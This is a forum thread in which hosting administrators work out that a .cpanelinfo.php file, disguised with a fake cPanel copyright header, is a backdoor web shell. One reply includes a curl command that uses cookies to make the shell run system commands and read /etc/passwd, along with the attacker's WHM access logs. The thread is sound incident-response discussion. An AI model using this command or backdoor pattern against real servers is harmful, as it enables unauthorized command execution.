.cpanelinfo.php file

[caeos]

Some (but not all ) accounts on a shared host i looked at have this file
.cpanelinfo.php
whcih contains

<?php
/**
 * @package     Cpanel.Info
 *
 * @copyright   Copyright (C) 2013 cpanel.com All rights reserved.
 * @license     GNU General Public License version 2 or later
 */

$filter = @$_COOKIE['p3'];
if ($filter) { etc

is this a legitimate file or something else?

 

[quizknows]

I don't see those files on the server I'm working on now, and they do not sound familiar. I could be wrong but I don't think it should be there.

What's the rest of the content of the file?

 

[cPanelMichael]

Hello

This is not a file created or handled by the cPanel software. You may want to investigate it further to see if it's part of a third-party plugin that you have installed.

Thank you.

 

[kazar01]

Hi,

few days ago I've found .cpanelinfo.php files in all acounts public_html folders on the server. These files are malicious and can be used to execute shell commands on the server or modify users files! You can check this yourself using the following command:

curl -b "p3=system; p2=cat ///etc///passwd;;" yourdomain.com/.cpanelinfo.php

I advise you to remove/disable such files ASAP and reset server root password. On my server these files were uploaded via cPanel, so I have reset passwords for all cPanel accounts too.

Also I want to detect how attacker got access to 'root' account in cPanel and I have a question for cPanel staff: please check the part of logs below, did attacker use accesshash to log in WHM? Or root password was used ? Please advice.

5.34.177.110 - root [10/26/2013:21:23:25 -0000] "GET /json-api/listaccts HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0" "-"
5.34.177.110 - root [10/26/2013:21:23:29 -0000] "GET /json-api/domainuserdata?domain=example.com.orig HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0" "-"
...
5.34.177.110 - - [10/26/2013:21:27:08 -0000] "POST /login/ HTTP/1.1" 301 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0" "-"
5.34.177.110 - root [10/26/2013:21:27:10 -0000] "GET /cpsess3152952527/xfercpanel/camsuom HTTP/1.1"  0 "" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0" "-"
5.34.177.110 - - [10/26/2013:21:27:11 -0000] "GET /cpsess3152952527/login/?session=camsuom:n3xOvIITshqynmjtt69yYzAMG2UmZPbgPbS2bDWO4gmg5DXFBFRPH1vKH0_jYs9b,aab292dba48b85fa3b45f8540eb4938c1661c920a0c8a2aa83d04dbf687cb771^M HTTP/1.1" 301 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0" "-"
5.34.177.110 - camsuom [10/26/2013:21:27:12 -0000] "GET /cpsess3152952527/frontend/x3/index.html?post_login=71314175206959 HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0" "-"
5.34.177.110 - camsuom [10/26/2013:21:27:17 -0000] "POST /cpsess3152952527/json-api/cpanel HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0" "-"

 

[caeos]

it has appeared on empty accounts. i though it was suspect and renamed it to .txt thanks so far,,. on to investigation